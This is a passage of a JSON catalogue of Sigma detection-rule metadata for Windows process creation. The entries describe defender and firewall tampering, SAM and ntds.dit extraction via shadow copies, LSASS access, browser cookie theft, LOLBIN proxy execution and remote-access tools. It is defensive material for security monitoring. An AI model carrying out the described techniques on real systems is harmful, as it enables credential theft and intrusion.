suspicious IIS native-code module installations via command line", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-11", "falsepositive": [ "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" ], "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "value": "IIS Native-Code Module Command Line Installation" }, { "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", "meta": { "author": "frack113", "creation_date": "2022-10-02", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_ultravnc.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", "value": "Use of UltraVNC Remote Access Software" }, { "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_whoami_all_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_all_execution.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c248c896-e412-4279-8c15-1c558067b6fa", "value": "Enumerate All Information With Whoami.EXE" }, { "description": "Detects execution of \"ftp.exe\" script with the \"-s\" or \"/s\" flag and any child processes ran by \"ftp.exe\".", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ftp_arbitrary_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ftp_arbitrary_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", "value": "Potential Arbitrary Command Execution Via FTP.EXE" }, { "description": "Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)\n", "meta": { "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_sensitive_file_access_shadowcopy.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sensitive_file_access_shadowcopy.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "value": "Sensitive File Access Via Volume Shadow Copy Backup" }, { "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spawned by an \"svchost.exe\" process", "meta": { "author": "Markus Neis", "creation_date": "2018-06-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mshta_lethalhta_technique.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.005" ] }, "related": [ { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", "value": "Potential LethalHTA Technique Execution" }, { "description": "Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_exec_from_trusted_locations.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Max_Mal_/status/1633863678909874176", "https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465", "Internal Research", "https://twitter.com/_JohnHammond/status/1588155401752788994", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f99abdf0-6283-4e71-bd2b-b5c048a94743", "value": "Potentially Suspicious Office Document Executed From Trusted Location" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-11", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_remote_access_tools_anydesk.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", "value": "Remote Access Tool - AnyDesk Execution" }, { "description": "Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-12", "falsepositive": [ "Legitimate packages that make use of external binaries such as Windows Terminal" ], "filename": "proc_creation_win_susp_appx_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "value": "Potentially Suspicious Windows App Activity" }, { "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" ], "filename": "proc_creation_win_lolbin_register_app.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "value": "REGISTER_APP.VBS Proxy Execution" }, { "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_where_browser_data_recon.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_where_browser_data_recon.yml" ], "tags": [ "attack.discovery", "attack.t1217" ] }, "related": [ { "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", "value": "Suspicious Where Execution" }, { "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", "meta": { "author": "frack113", "creation_date": "2022-12-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_namespace_defender.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/", "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml" ], "tags": [ "attack.credential-access", "attack.t1546.008" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "value": "Potential Windows Defender Tampering Via Wmic.EXE" }, { "description": "Detects netsh commands that turns off the Windows firewall", "meta": { "author": "Fatih Sirin", "creation_date": "2019-11-01", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_netsh_fw_disable.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004", "attack.s0108" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", "value": "Firewall Disabled via Netsh.EXE" }, { "description": "Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_pua_crassus.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/vu-ls/Crassus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_crassus.yml" ], "tags": [ "attack.discovery", "attack.t1590.001" ] }, "related": [ { "dest-uuid": "e3b168bd-fcd7-439e-9382-2e6c2f63514d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c32b543-1058-4808-91c6-5b31b8bed6c5", "value": "PUA - Crassus Execution" }, { "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/defaultnamehere/cookie_crimes/", "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml" ], "tags": [ "attack.credential-access", "attack.t1185" ] }, "related": [ { "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "value": "Potential Data Stealing Via Chromium Headless Debugging" }, { "description": "Detects ScreenConnect program starts that establish a remote access to a system.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-02-11", "falsepositive": [ "Legitimate use by administrative staff" ], "filename": "proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", "value": "Remote Access Tool - ScreenConnect Installation Execution" }, { "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-04-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_getprocess_lsass.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_getprocess_lsass.yml" ], "tags": [ "attack.credential-access", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "value": "PowerShell Get-Process LSASS" }, { "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", "meta": { "author": "Eli Salem, Sander Wiebing, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate modification of keys" ], "filename": "proc_creation_win_regini_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_execution.yml" ], "tags": [ "attack.t1112", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", "value": "Registry Modification Via Regini.EXE" }, { "description": "Detects suspicious child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_provlaunch_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f9999590-1f94-4a34-a91e-951e47bedefd", "value": "Suspicious Provlaunch.EXE Child Process" }, { "description": "Detects suspicious powershell invocations from interpreters or unusual programs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Microsoft Operations Manager (MOM)", "Other scripts" ], "filename": "proc_creation_win_powershell_script_engine_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_script_engine_parent.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", "value": "Suspicious PowerShell Invocation From Script Engines" }, { "description": "Detects file downloads directly from IP address URL using curl.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_download_direct_ip_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml" ], "tags": [ "attack.execution" ] }, "uuid": "9cc85849-3b02-4cb5-b371-3a1ff54f2218", "value": "File Download From IP URL Via Curl.EXE" }, { "description": "Detects the execution of malicious OneNote documents that contain embedded scripts.\nWhen a user clicks on a OneNote attachment and then on the malicious link inside the \".one\" file, it exports and executes the malicious embedded script from specific directories.\n", "meta": { "author": "@kostastsale", "creation_date": "2023-02-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_office_onenote_embedded_script_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bazaar.abuse.ch/browse/tag/one/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_onenote_embedded_script_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.001" ] }, "related": [ { "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84b1706c-932a-44c4-ae28-892b28a25b94", "value": "OneNote.EXE Execution of Malicious Embedded Scripts" }, { "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_mpiexec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", "https://twitter.com/mrd0x/status/1465058133303246867", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mpiexec.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", "value": "MpiExec Lolbin" }, { "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.\n", "meta": { "author": "Sreeman, Florian Roth (Nextron Systems), frack113", "creation_date": "2020-04-21", "falsepositive": [ "Some false positives are expected in some environment that may use this functionality to install and test their custom applications" ], "filename": "proc_creation_win_winget_local_install_via_manifest.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install", "https://lolbas-project.github.io/lolbas/Binaries/Winget/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", "value": "Install New Package Via Winget Local Manifest" }, { "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", "meta": { "author": "Andreas Hunkeler (@Karneades)", "creation_date": "2021-12-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_java_keytool_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", "https://redcanary.com/blog/intelligence-insights-december-2021", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_keytool_susp_child_process.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", "value": "Suspicious Shells Spawn by Java Utility Keytool" }, { "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate usage of appcmd to add new URL rewrite rules" ], "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r", "https://twitter.com/malmoeb/status/1616702107242971144", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", "value": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd" }, { "description": "Detects base64 encoded .NET reflective loading of Assembly", "meta": { "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "creation_date": "2022-03-01", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027", "attack.t1620" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "value": "PowerShell Base64 Encoded Reflective Assembly Load" }, { "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_certify.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/Certify", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certify.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1649" ] }, "related": [ { "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "762f2482-ff21-4970-8939-0aa317a886bb", "value": "HackTool - Certify Execution" }, { "description": "Detects suspicious child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bginfo_suspicious_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "811f459f-9231-45d4-959a-0266c6311987", "value": "Suspicious Child Process Of BgInfo.EXE" }, { "description": "Detects the execution of \"Wlrmdr.exe\" with the \"-u\" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.\nThis detection also focuses on any uncommon child processes spawned from \"Wlrmdr.exe\" as a supplement for those that posses \"ParentImage\" telemetry.\n", "meta": { "author": "frack113, manasmbellani", "creation_date": "2022-02-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wlrmdr_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/", 